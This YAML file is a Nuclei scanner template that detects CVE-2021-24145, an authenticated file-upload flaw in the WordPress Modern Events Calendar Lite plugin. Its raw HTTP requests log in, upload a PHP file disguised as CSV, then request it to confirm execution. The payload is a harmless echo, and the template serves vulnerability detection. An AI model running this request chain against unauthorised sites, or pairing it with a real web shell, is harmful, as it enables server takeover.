nuclei-templates/http/cves/2021/CVE-2021-24145.yaml

73 lines
2.8 KiB
YAML

id: CVE-2021-24145
info:
name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
author: theamanrawat
severity: high
description: |
WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
remediation: Fixed in version 5.16.5.
reference:
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
- https://github.com/dnr6419/CVE-2021-24145
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24145
cwe-id: CWE-434
epss-score: 0.93499
epss-percentile: 0.98822
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
Content-Type: text/csv
<?php echo 'CVE-2021-24145'; ?>
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="mec-ix-action"
import-start-bookings
-----------------------------132370916641787807752589698875--
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(header_3, "text/html")
- status_code_3 == 200
- contains(body_3, 'CVE-2021-24145')
condition: and
# digest: 4a0a00473045022046c4e3c00663b339f0758a13c58870a217122c055a5bacf0690e089b5f279bdb0221009817c3e2758f9a264da1a677ec2009fb992639a71acbf165017355c5061fc114:922c64590222798bb761d5b6d8e72950